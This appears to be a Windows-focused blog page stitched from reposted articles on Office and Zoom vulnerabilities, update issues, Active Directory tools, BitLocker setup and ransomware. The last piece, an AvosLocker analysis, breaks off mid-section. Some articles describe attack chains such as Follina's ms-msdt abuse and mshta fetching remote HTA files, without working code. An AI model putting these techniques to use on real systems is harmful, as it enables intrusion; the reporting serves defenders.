Category: Windows 11

Watch Out! Researchers Spot New Microsoft Office Zero-Day Exploit in the Wild

Cybersecurity researchers are calling attention to a zero-day flaw in Microsoft Office that could be abused to achieve arbitrary code execution on affected Windows systems.

The vulnerability came to light after an independent cybersecurity research team known as nao_sec uncovered a Word document (“05-2022-0438.doc“) that was uploaded to VirusTotal from an IP address in Belarus.

“It uses Word’s external link to load the HTML and then uses the ‘ms-msdt’ scheme to execute PowerShell code,” the researchers noted in a series of tweets last week.

According to security researcher Kevin Beaumont, who dubbed the flaw “Follina,” the maldoc leverages Word’s remote template feature to fetch an HTML file from a server, which then makes use of the “ms-msdt://” URI scheme to run the malicious payload.

The shortcoming has been so named because the malicious sample references 0438, which is the area code of Follina, a municipality in the Italian city of Treviso.

MSDT is short for Microsoft Support Diagnostics Tool, a utility that’s used to troubleshoot and collect diagnostic data for analysis by support professionals to resolve a problem.https://www.youtube.com/embed/GybD70_rZDs

“There’s a lot going on here, but the first problem is Microsoft Word is executing the code via msdt (a support tool) even if macros are disabled,” Beaumont explained.

Protected View does kick in, although if you change the document to RTF form, it runs without even opening the document (via the preview tab in Explorer) let alone Protected View,” the researcher added.

In a standalone analysis, cybersecurity company Huntress Labs detailed the attack flow, noting the HTML file (“RDF842l.html”) that triggers the exploit originated from a now-unreachable domain named “xmlformats[.]com.”

“A Rich Text Format file (.RTF) could trigger the invocation of this exploit with just the Preview Pane within Windows Explorer,” Huntress Labs’ John Hammond said. “Much like CVE-2021-40444, this extends the severity of this threat by not just ‘single-click’ to exploit, but potentially with a ‘zero-click’ trigger.”

Multiple Microsoft Office versions, including Office, Office 2016, and Office 2021, are said to be affected, although other versions are expected to be vulnerable as well.

What’s more, Richard Warren of NCC Group managed to demonstrate an exploit on Office Professional Pro with April 2022 patches running on an up-to-date Windows 11 machine with the preview pane enabled.

“Microsoft are going to need to patch it across all the different product offerings, and security vendors will need robust detection and blocking,” Beaumont said. We have reached out to Microsoft for comment, and we’ll update the story once we hear back.

Source :
https://thehackernews.com/2022/05/watch-out-researchers-spot-new.html

Best Active Directory Management Tools

IT teams rely on Active Directory (AD) to keep networks secure and maintain user accounts — but they often need to adhere to strict budget limitations when it comes to selecting software to help. That’s why we’ve put together this list of the top free Active Directory management tools.

Our picks focus on AD tools that will help you complete routine AD management tasks much faster so your team has time to focus on other priorities. We’ve grouped these free Active Directory tools into three categories:

Active Directory Reporting, Monitoring and Auditing Tools

Microsoft Active Directory Explorer

Microsoft Active Directory Explorer is an advanced administration tool that makes it easy to search for, view and edit extended information about AD objects. It is similar to AD Users and Computers but has at least one key additional benefit — it allows you to view object properties and attributes without opening additional dialog boxes.

AD Explorer also enables you to save snapshots of an AD database for offline viewing and database version comparisons. When you load a saved snapshot, you can work with it as you would use a live database.

Other features include:

  • Defining favorite locations
  • Editing permissions
  • Viewing an object’s scheme
  • Executing sophisticated searches that you can save and re-execute

Handpicked related content:

Netwrix Auditor for Active Directory

Netwrix Auditor for Active Directory (free community edition) gives you visibility into what’s happening inside domains while eliminating the time-consuming tasks of analyzing endless native logs. Netwrix Auditor tracks logons and all changes to Active Directory users, groups, organizational units and Group Policy. It generates a daily activity summary that details all changes and logon activity that occurred during the previous 24 hours, including the before and after values for each modification.

Netwrix Account Lockout Examiner

Netwrix Account Lockout Examiner is well known as one of the best Active Directory tools for quickly resolving one of the most pressing issues with AD: account lockouts. It enables you to identify the root cause of lockouts in a single keystroke, slashing troubleshooting time by up to 90 percent. This lightweight and intuitive tool empowers you to investigate issues like why the same account repeatedly locks out without having to slog through a mountain of cryptic event logs — just enter the username and click a button.

Netwrix Effective Permissions Reporting Tool

Netwrix Effective Permissions Reporting Tool simplifies auditing of access permissions in Active Directory. You can view a user’s account group membership, the permissions the account has to every AD object and how those permissions are granted. It also shows file and folder effective permissions, so you can determine who has access to your data and how their access was gained. You can export this information to an HTML file.

Netwrix Bulk Password Reset

Netwrix Bulk Password Reset enables you to reset local admin and user passwords across multiple workstations at once, remotely, without actually logging into them. This functionality enhances Windows Server security.

Netwrix Inactive User Tracker

Netwrix Inactive User Tracker provides insight into stale Active Directory user accounts so you can disable or delete unneeded accounts before malicious actors can exploit them to gain access to resources and services on your network.

Netwrix Password Expiration Notifier

Netwrix Password Expiration Notifier automatically sends notifications about upcoming AD password expiration to users and their managers. This proactive approach enables you to remain in compliance with password security best practices without sacrificing user productivity or increasing helpdesk workload.

Cjwdev Active Directory Info

Cjwdev Active Directory Info is a free Active Directory reporting and analysis tool that enables you to review the configuration settings of AD objects. You can quickly generate CSV, HTML or TXT reports to gain insight into things like:

  • Locked accounts
  • Users who have never logged on
  • Users with the “password never expires” flag
  • Enabled and disabled users
  • Deleted groups
  • Computers deleted in the last 30 days
  • Group Policy objects modified in the last 30 days

Cjwdev Active Directory Permissions Reporter

Cjwdev Active Directory Permissions Reporter extracts all permissions for every object in your domain. Note that the free edition of Cjwdev AD Permissions Reporter does not support the command line and you cannot filter or export results.

ENow Compass

ENow Compass provides real-time network monitoring to help you identify issues that could evolve into bigger problems. ENow Compass is a powerful toolset, but the company does not offer a free version. Users can start with a 14-day free trial with registration.

MaxPowerSoft Active Directory Reports Lite

MaxPowerSoft Active Directory Reports Lite allows you to load up to 200 objects from Active Directory and generate auditing reports on users, groups, organizational units, computers and GPOs. The paid version of grants access to more reports and many more features.

Active Directory FastReporter

Active Directory FastReporter generates a variety of predefined reports on your AD infrastructure. The free version doesn’t allow you to create custom reports, export reports or use automation features.

LDAPSoft Active Directory Browser

LDAPSoft Active Directory Browser simplifies SSL communication and streamlines the process of browsing your AD hierarchy. You can search for entries, view all available attributes and run SQL-LDAP statements.

Softerra Browser for LDAP

Softerra Browser for LDAP is a lightweight tool that allows you to view, browse, search and export information from LDAP. It is free to use for 30 days — you’ll need to register a paid account to use it past this point.

WiseSoft Password Control

WiseSoft Password Control can reset user passwords in bulk, which saves time and effort when managing service account passwords. It also includes the ability to make other bulk changes, such as enabling and disabling user accounts, group membership functions, descriptions and departments.Handpicked related content:

Active Directory Management Tools

Albus Bit Active Directory Administrator

Albus Bit Active Directory Administrator enables you to manage user and computer accounts across your Active Directory domain from a single interface. You can use the  built-in search templates or create your own, and use the results to disable inactive accounts, move accounts to different organizational units or remove users from groups.

CjWdev Active Directory Tidy

CjWdev Active Directory Tidy allows you to easily manage your AD accounts in bulk. For example, you can add multiple accounts to a specific security group, or set random passwords or a particular expiry date for a set of accounts.

The tool’s filtering functionality makes it easy to clean up your AD. For example, you can filter by last login date to find all inactive user and computer accounts to determine whether you should remove them from your domain. The paid version of this tool also enables you to export AD settings to XML.

Spiceworks People View

Spiceworks People View allows you to view and update AD user account properties, such as email, phone number, title and department. You can also add devices to user profiles to monitor installed software programs and update it when needed. You can also reset passwords and enable or disable user accounts. The tool also offers self-administered password and user profile management on a self-service web portal, and real-time status monitoring of all your devices.

Spiceworks offers other useful tools. For example, Network Monitor performs real-time status monitoring of all your devices.

Microsoft AdRestore

Microsoft AdRestore is a single-task tool that enumerates all tombstoned objects in your AD domain and enables you to restore them individually as needed.

Windows PowerShell

Windows PowerShell is undoubtedly the most powerful Active Directory tool. However, it can be challenging to use because it lacks a graphical interface. To accomplish your tasks, you’ll need to use cmdlets and scripts like the following:

  • Disable a user account: Disable-ADAccount username
  • Enable a user account: Enable-ADAccount username
  • Unlock a user account: Unlock-ADAccount username
  • Delete a user account: Remove-ADUser username
  • Find all empty groups: Get-adgroup -filter * | where {-Not ($_ | get-adgroupmember)} | Select Name
  • Add a member to a group: Add-adgroupmember “groupname” –username
  • Enumerate the members of a group: Get-ADGroupMember “groupname
  • See what groups a user account is a member of: Get-aduser username -property Memberof | Select -ExpandProperty memberOf
  • Disable a computer account: Disable-ADAccount -Identity “computername
  • Find computers by type: Get-ADComputer -Filter * -Properties OperatingSystem | Select OperatingSystem -unique | Sort OperatingSystem
  • Create an organizational unit: New-ADOrganizationalUnit -Name OUname -Path “dc=domainname,dc=com”
  • Create a computer account: New-ADComputer -Name username -Path “ou=OUname,dc=DCname,dc=com”
  • Create a user account: New-ADUser -Name username -Path “ou=OUname,dc=DCname,dc=com”

Adaxes

Adaxes streamlines routine management functions in Active Directory, Microsoft Exchange and Microsoft 365 environments. You can use it to delegate privileges, control authorizations and stay in compliance with data mandates. Softerra offers a 30-day free trial.

CENTREL Solutions XIA Automation

CENTREL Solutions XIA Automation helps you automate IT management tasks, such as account provisioning, user management and password changes. It includes time-saving features like bulk provisioning of accounts from CSV to AD, Exchange, Google or Office 365.

Dameware Remote Everywhere

Dameware Remote Everywhere is a pricey commercial-grade tool at $540 (and up), but it is notable for its powerful functionality — especially for enterprise-level network needs.

“Remote Everywhere” refers to the tool’s cloud-based solutions. Users enjoy safe, remote support with advanced encryption and multifactor authentication, essential endpoint support for any computer or device, and a reporting engine that can handle virtually any reporting task. New users can get a fully functional version of Dameware Remote Everywhere for 14 days.

Active Directory Utility Tools

Microsoft Active Directory Replication Status (ADREPLSTATUS) Tool

Microsoft ADREPLSTATUS Tool is a single-purpose tool that helps you analyze the replication of domain controllers in your network.

Cjwdev Group Manager

Cjwdev Group Manager allows the manager of a group to manage roles and settings for the group, including adding and removing other users and exporting group members to a CSV file. The free edition enables you to manage only a single group, and you cannot or add new members from other domains.

Cjwdev Active Directory Photo Edit

Cjwdev Active Directory Photo Edit enables you to import and upload images to an AD attribute that can be displayed in Outlook 2010, Lync and SharePoint. The free edition can’t process pictures for users and contacts in bulk, but the paid version offers this feature.

Cjwdev Managed Service Accounts GUI

Cjwdev Managed Service Accounts GUI helps you configure managed service accounts using an intuitive GUI that eliminates the need for PowerShell commands.

Specops Password Auditor

Specops Password Auditor scans your Active Directory and identifies password-related vulnerabilities so you can reduce your attack surface and maintain compliance.

Specops Software Gpupdate

Specops Software Gpupdate enables remote administration of computers and organizational units. For example, you can refresh Group Policy or wake up, shut down or restart a PC remotely.

Specops Command

Specops Command is a PowerShell and VBScript interface that helps you automate many Active Directory administrative tasks.

Zohno Z-Hire and Z-Term

Zohno Z-Hire and Z-Term are single-task tools. Z-Hire speeds the user account creation process for new hires, while Z-Term helps with account removal when an employee leaves the organization.

SysOpsTools Active Directory Query

SysOpsTools Active Directory Query is a free executable tool — no installation required — that can be used to quickly search AD for information about a specific user or computer, including schema attributes that are normally not readable.

RIA-Media SysAdmin and SysAdmin Anywhere 

RIA-Media SysAdmin and RIA-Media SysAdmin Anywhere are helpful for facilitating a long list of activities:

  • Resetting user passwords
  • Adding, editing and deleting AD objects
  • Adding photos
  • Shutting down and restarting computers remotely
  • Checking for updates
  • Monitoring hardware and computers

SysAdmin and SysAdmin Anywhere both offer a free trial.

Codeplex ADModify.NET

Codeplex ADModify.NET is a single-use tool that allows you to modify multiple user attributes at once.

WiseSoft Bulk Password Control

WiseSoft Bulk Password Control enables you to change passwords on multiple accounts at the same time using the tool’s password generator feature. You can also enable, disable and unlock AD accounts in bulk.

Conclusion

With so many options to choose from, it can be challenging to find the right mix of AD management tools for your needs. The most effective way to make that choice is to install different tools and try them out in your AD environment. This will give you insight into how well they will work for your specific needs and preferences.

Source :
https://blog.netwrix.com/2021/03/10/active-directory-tools/

Windows 11 KB5014019 update fixes app crashes, slow copying

Microsoft has released optional cumulative update previews for Windows 11, Windows 10 version 1809, and Windows Server 2022, with fixes for Direct3D issues impacting client and server systems.

The updates are part of Microsoft’s scheduled April 2022 monthly “C” updates, allowing Windows users to test the fixes released on June 15th as part of next month’s Patch Tuesday.

Unlike regular Patch Tuesday Windows updates, scheduled non-security preview updates are optional. They are issued to test bug fixes and performance improvements before the general release, and they don’t provide security updates.

Cumulative updates released today include:

To install the updates, you have to go to Settings > Windows Update and manually ‘Check for updates.’ Windows will not install them until you click the ‘Download now’ button because they’re optional updates.

You can also manually download and install these cumulative update previews from the Microsoft Update Catalog.

“The preview update for other supported versions of Windows 10 will be available in the near term,” Microsoft said.

Windows 11 KB5014019 update
Windows 11 KB5014019 update (BleepingComputer)

KB5014019 fixes Direct3D app crashes

Today’s Windows optional updates come with fixes for issues that might cause some applications to crash or trigger various problems.

As Microsoft explained, KB5014019 “addresses an issue that might affect some apps that use d3d9.dll with certain graphics cards and might cause those apps to close unexpectedly.”

The same cumulative update also fixes a known issue affecting specific GPUs and could “cause apps to close unexpectedly or cause intermittent issues that affect some apps that use Direct3D 9.”

This update also fixes an issue that might cause file copying to be slower and another one preventing BitLocker from encrypting when using the silent encryption option.

KB5014019 addresses a known issue impacting the Trusted Platform Module (TPM) driver that might increase the system’s startup time.

What’s new in today’s Windows updates

After installing the KB5014019 non-security cumulative update preview, Windows 11 will have the build number changed to 22000.708.

The Windows 11 update preview includes dozens of quality improvements and fixes, including:

  • Addresses an issue that causes blurry app icons in Search results when the display’s dots per inch (dpi) scaling is greater than 100%.
  • New! Windows spotlight on the desktop brings the world to your desktop with new background pictures. With this feature, new pictures will automatically appear as your desktop background. This feature already exists for the lock screen. To turn on this feature, go to Settings > Personalization > Background > Personalize your background. Choose Windows spotlight.
  • Addresses an issue that fails to maintain the display brightness after changing the display mode.

    Source :
    https://www.bleepingcomputer.com/news/microsoft/windows-11-kb5014019-update-fixes-app-crashes-slow-copying/

Windows 11 KB5014019 breaks Trend Micro ransomware protection

This week’s Windows optional cumulative update previews have introduced a compatibility issue with some of Trend Micro’s security products that breaks some of their capabilities, including the ransomware protection feature.

“The UMH component used by several Trend Micro endpoint and server protection products is responsible for some advanced features such as ransomware protection,” the antivirus vendor revealed.

“Trend Micro is aware of an potential issue where customers who apply the optional Microsoft Windows 11 or Windows 2022 optional preview patches (KB5014019) and reboot would then find that the Trend Micro UMH driver would stop.”

The known issue affects the User Mode Hooking (UMH) component used by several Trend Micro endpoint solutions, including Apex One 2019, Worry-Free Business Security Advanced 10.0, Apex One as a Service 2019, Deep Security 20.0, Deep Security 12.0, and Worry-Free Business Security Services 6.7.

The Japanese cybersecurity company is now working on a fix to address this issue before the update previews are pushed to all Windows customers as part of the June 2022 Patch Tuesday.

How to restore Trend Micro endpoint solution capabilities

Luckily, unlike regular Patch Tuesday Windows updates, this week’s preview updates are optional and they were issued to test bug fixes and performance improvements before the general release.

Windows users have to manually check for them from Settings > Windows Update. They will not be installed until you click the ‘Download now’ button, limiting the number of potentially impacted users.

Impacted Windows platforms include both client and server versions with the problems experienced on systems running Windows 11, Windows 10 version 1809, and Windows Server 2022.

Trend Micro customers who have installed the optional Windows optional patch may either uninstall the patch temporarily or reach out to support to get a UMH debug module that should revive their security solution’s capabilities.

Windows users can remove the preview updates using the following commands from an Elevated Command Prompt.

Windows 10 1809: wusa /uninstall /kb:5014022 
Windows 11: wusa /uninstall /kb:5014019
Windows Server 2022: wusa /uninstall /kb:5014021

Source :
https://www.bleepingcomputer.com/news/security/windows-11-kb5014019-breaks-trend-micro-ransomware-protection/

New Zoom Flaws Could Let Attackers Hack Victims Just by Sending them a Message

Popular video conferencing service Zoom has resolved as many as four security vulnerabilities, which could be exploited to compromise another user over chat by sending specially crafted Extensible Messaging and Presence Protocol (XMPP) messages and execute malicious code.

Tracked from CVE-2022-22784 through CVE-2022-22787, the issues range between 5.9 and 8.1 in severity. Ivan Fratric of Google Project Zero has been credited with discovering and reporting all the four flaws in February 2022.

The list of bugs is as follows –

  • CVE-2022-22784 (CVSS score: 8.1) – Improper XML Parsing in Zoom Client for Meetings
  • CVE-2022-22785 (CVSS score: 5.9) – Improperly constrained session cookies in Zoom Client for Meetings
  • CVE-2022-22786 (CVSS score: 7.5) – Update package downgrade in Zoom Client for Meetings for Windows
  • CVE-2022-22787 (CVSS score: 5.9) – Insufficient hostname validation during server switch in Zoom Client for Meetings

With Zoom’s chat functionality built on top of the XMPP standard, successful exploitation of the issues could enable an attacker to force a vulnerable client to masquerade a Zoom user, connect to a malicious server, and even download a rogue update, resulting in arbitrary code execution stemming from a downgrade attack.

Fratric dubbed the zero-click attack sequence as a case of “XMPP Stanza Smuggling,” adding “one user might be able to spoof messages as if coming from another user” and that “an attacker can send control messages which will be accepted as if coming from the server.”

At its core, the issues take advantage of parsing inconsistencies between XML parsers in Zoom’s client and server to “smuggle” arbitrary XMPP stanzas — a basic unit of communication in XMPP — to the victim client.

Specifically, the exploit chain can be weaponized to hijack the software update mechanism and make the client connect to a man-in-the-middle server that serves up an old, less secure version of the Zoom client.

While the downgrade attack singles out the Windows version of the app, CVE-2022-22784, CVE-2022-22785, and CVE-2022-22787 impact Android, iOS, Linux, macOS, and Windows.

The patches arrive less than a month after Zoom addressed two high-severity flaws (CVE-2022-22782 and CVE-2022-22783) that could lead to local privilege escalation and exposure of memory contents in its on-premise Meeting services. Also fixed was another instance of a downgrade attack (CVE-2022-22781) in Zoom’s macOS app.

Users of the application are recommended to update to the latest version (5.10.0) to mitigate any potential threats arising out of active exploitation of the flaws.

Source :
https://thehackernews.com/2022/05/new-zoom-flaws-could-let-attackers-hack.html

Get the most out of Windows Server with these 5 best practices

We’ve invested in Windows Server for nearly 30 years, and we continue to find new ways to empower businesses who trust Windows Server as the operating system for their workloads. Over this time, we understand that business requirements have become more complex and demanding. Thus, we are energized when we hear how customers continue to trust Windows Server to navigate these ever-evolving requirements and run business and mission-critical workloads.

We want to continue to invest in your organizations’ success and enable you to get the most out of Windows Server by keeping you informed of the latest product announcements, news, and overall best practices. Here are the top five to-do’s for you to make the most out of Windows Server:

1. Patch and install security updates without rebooting with Hotpatch

Hotpatch is now generally available. As part of Azure Automanage for Windows Server, this capability allows you to keep your Windows Server virtual machines on Azure up-to-date without rebooting, enabling higher availability with faster and more secure delivery of updates. Other capabilities that are part of Azure Automanage for Windows Server include SMB over QUIC, as well as extended network for Azure, which lets you keep your on-premises IP addresses when you migrate to Azure. Learn more about why Azure is the best destination for Windows Server.

2. Take the recently available Windows Server Hybrid Administrator Certification

Invest in your career and skills with this brand-new Windows Server certification. With this certification, you can keep the Windows Server knowledge you have built your career on and learn how to apply it in the current state of hybrid cloud computing. Earn this certification for managing, monitoring, and securing applications on-premises, in Azure, and at the edge. Learn more about Windows Server Hybrid Administrator Associate certification today.

3. Upgrade to Windows Server 2022

With Windows Server 2022, get the latest innovation for you to continue running your workloads securely, enable new hybrid cloud scenarios, and modernize applications to meet your ever-evolving business requirements. Learn more about investing in your success with Windows Server.

4. Protect your workloads by taking advantage of free extended security updates (ESUs) in Azure

While many customers have adopted Windows Server 2022, we also understand that some need more time to modernize as support for older versions of Windows Server will eventually end.

  • For Windows Server 2012/2012 R2 customers, the end of support date is October 10, 2023. 
  • For Windows Server 2008/2008 R2 customers, the third year of extended security updates are coming to an end on January 10, 2023. Customers can get an additional fourth year of free extended security updates (ESUs-only) on Azure (including Azure Stack HCI, Azure Stack Hub, and other Azure products). With this, customers will have until January 9, 2024 for Windows Server 2008/2008 R2 to upgrade to a supported release.

We are committed to supporting you as you start planning for end of support if you are running workloads on older versions of Windows Server. Learn more about end of support deadlines for Windows Server 2008/R2 and 2012/R2 and your options.

5. Combine extended security updates with Azure Hybrid Benefit to save even more

In addition to all the innovative Windows Server capabilities available only on Azure, it also has offers for you to start migrating your workloads with Azure Hybrid Benefit. It is a licensing benefit that allows you to save even more by using existing Windows Server licenses on Azure. Learn more about how much you can save with Azure Hybrid Benefit.

Ask questions and engage in our community

Get started implementing these Windows Server best practices today! Join the conversation by sharing stories or questions you have here:  

System Center 2022 is now generally available

Datacenters are a core part of any IT infrastructure for businesses that run mission-critical workloads. However, with components across compute, networking, and storage, as well as the advancement in cloud technologies, the management of your datacenter environment can quickly become complex. Ever since its release in 2008, Microsoft System Center has been the solution that simplifies datacenter management across your IT environments.

Today, we are excited to announce the general availability of System Center 2022, which includes System Center Operations Manager (SCOM), Virtual Machine Manager (VMM), System Center Orchestrator (SCORCH), Service Manager (SM), and Data Protection Manager (DPM). With this release, we are continuing to bring new capabilities for best-in-class datacenter management across diverse IT environments that could be comprised of Windows Server, Azure Stack HCI, or VMWare deployments. We have been energized to hear of organizations such as OlympiaSchaeffler, and Entain who have validated the capabilities of System Center 2022 during the preview. Now, let us dive into what is new with System Center 2022.

Why upgrade to System Center 2022

Best-in-class datacenter management

Your IT environments are ever-evolving to have applications running on a diverse set of hardware. Your workforce is spread across multiple locations and remote management is the new normal. System Center 2022 focuses on simplifying collaboration and providing consistent control for all your environments.

Enhanced access control capabilities in SCOM facilitate simpler management of permissions on the monitoring data and alert actions. A critical piece toward adoption of DevOps practices, empowering the users with the right level of control. The integration with Microsoft Teams and management of alert closures reduce the circle time between the application owners and the SCOM administrator. The developers can get notified about alerts for their applications on the Teams channels.

Additionally, to meet the needs of growing environments, you can now assign both IPv4 and IPv6 IP addresses to the software-defined networking (SDN) deployments with VMM. Performance and technology optimizations to the data protection manager mean you get more control and speed on the backups and restores.

Overall, this release gives you more control in managing the environment and working with the DevOps teams.

Flexible infrastructure platform

Datacenters are becoming more heterogeneous, with multiple host platforms and hypervisors, Windows/Linux, VMware, and Hyper-Converged Infrastructure (HCI). System Center 2022 enables the unification of management practices for the datacenter, irrespective of the platform in use.

System Center 2022 is the best toolset to manage your Windows Server 2022 and SQL Server infrastructure. This includes using Windows Server 2022 for the management infrastructure and managing the Windows Server 2022 based environment. In addition to a comprehensive management experience for Windows Server 2022 workloads, this release of System Center adds support for managing Azure Stack HCI 21H2, VMware 7.0 hosts, and the latest Linux distros. You can create, configure, and register HCI 21H2 clusters, control virtual machines on the HCI clusters, set up SDN controllers, and manage storage pools from VMM. There are new management packs in SCOM for monitoring the Azure Stack HCI clusters. To protect the virtual machines on Stack HCI clusters, Microsoft Azure Backup Server can now be used.

Hybrid management with Azure

Efficiently managing IT resources that are sprawled across various locations without slowing down developer innovation is a key challenge that IT leaders face today. Azure Arc enables you to seamlessly govern, manage, and secure Windows and Linux servers, Kubernetes clusters, and applications across on-premises, multiple clouds, and the edge from a single control plane.

We will be bringing hybrid capabilities with System Center 2022 to standardize management and governance across on-premises and cloud environments while reusing your existing investments in System Center.

Stay tuned for more on these exciting capabilities!

Get started with System Center 2022

Anti-Ransomware Day: What Can We Do to Prevent the Next WannaCry?

This Anti-Ransomware Day, SonicWall looks at how cybersecurity has changed since WannaCry — and what we can do to ensure we never see such a widespread, devastating and preventable attack again.

On May 12, 2017, attackers identified a vulnerability in a Windows device somewhere in Europe — and in the process, set off an attack that would ultimately impact roughly 200,000 victims and over 300,000 endpoints across 150 countries. The devastation wrought by WannaCry caused financial losses of roughly $4 billion before the strain was halted by an unlikely hero just hours later. But perhaps most devastating of all was that it was completely preventable.

To help raise awareness about ransomware strains like WannaCry and the steps needed to combat them, INTERPOL in 2020 teamed up with cybersecurity firm Kaspersky to declare May 12 Anti-Ransomware Day. By taking a few important steps, organizations can help stop the next major ransomware attack, averting the potential for downtime, reputational damage, fines and more.

“Cybercrime and cybersecurity may seem like a complex issue that is difficult to understand unless you are an expert in the field — this is not the case. INTERPOL’s campaign aims to demystify these cyberthreats and offer simple, concrete steps which everybody can take to protect themselves,” INTERPOL’s Director of Cybercrime Craig Jones said.

What’s Changed Since WannaCry?

In the years since the infamous attack, ransomware has continued to grow. In 2021, SonicWall Capture Labs threat researchers recorded 623.3 million ransomware attempts on customers globally. This represents an increase of 105% from 2020’s total and a staggering 232% since 2019.

And while ransomware was a hot topic worldwide due to attacks such as WannaCry and NotPetya, which would begin its own savage trek across the globe just six weeks later, ransomware volume in 2017 was less than a third of what it was in 2021.

Weakened, but Still Wreaking Havoc

While variants such as Ryuk, SamSam and Cerber made up 62% of the ransomware attacks recorded by SonicWall in 2021, WannaCry lives on — and in surprising numbers. By now, five years on, the number of vulnerable Windows systems should be virtually zero. A patch for the EternalBlue vulnerability exploited by WannaCry was released two months prior to the attack, and Microsoft later took the unusual step of also releasing patches for Windows systems that were old and no longer supported.

But in 2020, SonicWall observed 233,000 instances of WannaCry, and in 2021, 100,000 hits were observed — indicating that there are still vulnerable Windows systems in the wild that need to be patched.

We Can Worry … Or Get to Work

What made WannaCry so successful was that many organizations at the time took a set-it-and-forget-it approach to IT, leaving vulnerable hundreds of thousands of endpoints that could otherwise have been patched prior to the attack. But while patching is a crucial part of any cybersecurity strategy, it can’t work alone — there are still a number of other steps organizations need to take to bolster their odds against the next big ransomware attack.

  • Update: Whenever possible, enable automatic updates on applications and devices on your network — both for operating systems and for any other apps in your ecosystem.
  • Upgrade: The older an operating system gets, the more malware and other threats are created to target them. Retire any software or hardware that is obsolete or no longer supported by the vendor.
  • Duplicate: All important data should be backed up to a place inaccessible by attackers. Having adequate and up-to-date backups on hand significantly eases recovery in the event of a ransomware attack.
  • Educate: A staggering 91% of all cyberattacks start with someone opening a phishing email. Teach employees to be wary any time they receive an email, particularly one with an attachment or link.
  • Safeguard: By taking the above steps, most attacks can be prevented, but not all. They’re called “best practices” and not “universal practices” for a reason: If any are allowed to lapse — or new methods are found to circumvent them — organizations will need a strong last line of defense. An advanced, multi-layer platform that includes endpoint security, next-gen firewall services, email security and secure mobile access can work to eliminate blind spots and eradicate both known and unknown threats.

“In the past two years, we have seen how cybercriminals have become bolder in using ransomware. Organizations targeted by such attacks are not limited to corporations and governmental organizations — ransomware operators are ready to hit essentially any business regardless of size,” Jones said. “To fight them, we need to educate ourselves on how they work and fight them as one. Anti-Ransomware Day is a good opportunity to highlight this need and remind the public of how important it is to adopt effective security practices.”

Source :
https://blog.sonicwall.com/en-us/2022/05/anti-ransomware-day-what-can-we-do-to-prevent-the-next-wannacry/

How to Enable a Pre-Boot BitLocker PIN on Windows

If you encrypt your Windows system drive with BitLocker, you can add a PIN for additional security. You’ll need to enter the PIN each time you turn on your PC, before Windows will even start. This is separate from a login PIN, which you enter after Windows boots up.

RELATED: How to Use a USB Key to Unlock a BitLocker-Encrypted PC

A pre-boot PIN prevents the encryption key from automatically being loaded into system memory during the boot process, which protects against direct memory access (DMA) attacks on systems with hardware vulnerable to them. Microsoft’s documentation explains this in more detail.

Step One: Enable BitLocker (If You Haven’t Already)

RELATED: How to Set Up BitLocker Encryption on Windows

This is a BitLocker feature, so you have to use BitLocker encryption to set a pre-boot PIN. This is only available on Professional and Enterprise editions of Windows. Before you can set a PIN, you have to enable BitLocker for your system drive.

Note that, if you go out of your way to enable BitLocker on a computer without a TPM, you’ll be prompted to create a startup password that’s used instead of the TPM. The below steps are only necessary when enabling BitLocker on computers with TPMs, which most modern computers have.

If you have a Home version of Windows, you won’t be able to use BitLocker. You may have the Device Encryption feature instead, but this works differently from BitLocker and doesn’t allow you to provide a startup key.

Step Two: Enable the Startup PIN in Group Policy Editor

Once you’ve enabled BitLocker, you’ll need to go out of your way to enable a PIN with it. This requires a Group Policy settings change. To open the Group Policy Editor, press Windows+R, type “gpedit.msc” into the Run dialog, and press Enter.

Head to Computer Configuration > Administrative Templates > Windows Components > BitLocker Drive Encryption > Operating System Drives in the Group Policy window.

Double-click the “Require Additional Authentication at Startup” Option in the right pane.

Select “Enabled” at the top of the window here. Then, click the box under “Configure TPM Startup PIN” and select the “Require Startup PIN With TPM” option. Click “OK” to save your changes.

Step Three: Add a PIN to Your Drive

You can now use the manage-bde command to add the PIN to your BitLocker-encrypted drive.

To do this, launch a Command Prompt window as Administrator. On Windows 10 or 8, right-click the Start button and select “Command Prompt (Admin)”. On Windows 7, find the “Command Prompt” shortcut in the Start menu, right-click it, and select “Run as Administrator”

Run the following command. The below command works on your C: drive, so if you want to require a startup key for another drive, enter its drive letter instead of c: .

manage-bde -protectors -add c: -TPMAndPIN

You’ll be prompted to enter your PIN here. The next time you boot, you’ll be asked for this PIN.

To double-check whether the TPMAndPIN protector was added, you can run the following command:

manage-bde -status

(The “Numerical Password” key protector displayed here is your recovery key.)

How to Change Your BitLocker PIN

To change the PIN in the future, open a Command Prompt window as Administrator and run the following command:

manage-bde -changepin c:

You’ll need to type and confirm your new PIN before continuing.

How to Remove the PIN Requirement

If you change your mind and want to stop using the PIN later, you can undo this change.

First, you’ll need to head to the Group Policy window and change the option back to “Allow Startup PIN With TPM”. You can’t leave the option set to “Require Startup PIN With TPM” or Windows won’t allow you to remove the PIN.

Next, open a Command Prompt window as Administrator and run the following command:

manage-bde -protectors -add c: -TPM

This will replace the “TPMandPIN” requirement with a “TPM” requirement, deleting the PIN. Your BitLocker drive will automatically unlock via your computer’s TPM when you boot.

To check that this completed successfully, run the status command again:

manage-bde -status c:

If you forget the PIN, you’ll need to provide the BitLocker recovery code you should have saved somewhere safe when you enabled BitLocker for your system drive.

Source :
https://www.howtogeek.com/262720/how-to-enable-a-pre-boot-bitlocker-pin-on-windows/

AvosLocker Ransomware Variant Abuses Driver File to Disable Anti-Virus, Scans for Log4shell

We found samples of AvosLocker ransomware that makes use of a legitimate driver file to disable anti-virus solutions and detection evasion. While previous AvosLocker infections employ similar routines, this is the first sample we observed from the US with the capability to disable a defense solution using a legitimate Avast Anti-Rootkit Driver file (asWarPot.sys).  In addition, the ransomware is also capable of scanning multiple endpoints for the Log4j vulnerability Log4shell using Nmap NSE script.

Infection chain

fig1-avoslocker-ransomware-disables-av-scans-log4shell
Figure 1. AvosLocker infection chain

According to our analysis, the suspected entry point is via the Zoho ManageEngine ADSelfService Plus (ADSS) exploit:

fig2-avoslocker-ransomware-disables-av-scans-log4shell
Figure 2. The ADSS exploit abusing CVE-2021-40539

Due to the lack of network traffic details, we could not identify the exact CVE ID of the security gap the attacker used. However, there are some indications that they abused the same vulnerability previously documented by Synacktiv during a pentest, CVE-2021-40539. The gap we observed was particularly similar to the creation of JSP files (test.jsp), execution of keytool.exe with “null” parameters to run a crafted Java class/code.

Mapping the infection

The ADSS JAVA component (C:\ManageEngine\ADSelfService Plus\jre\bin\java.exe) executed mshta.exe to remotely run a remotely-hosted HTML application (HTA) file from the attackers’ command and control (C&C) server. Using Trend Micro™ Vision One™, we mapped out the processes that the infection performed to spawn the process. 

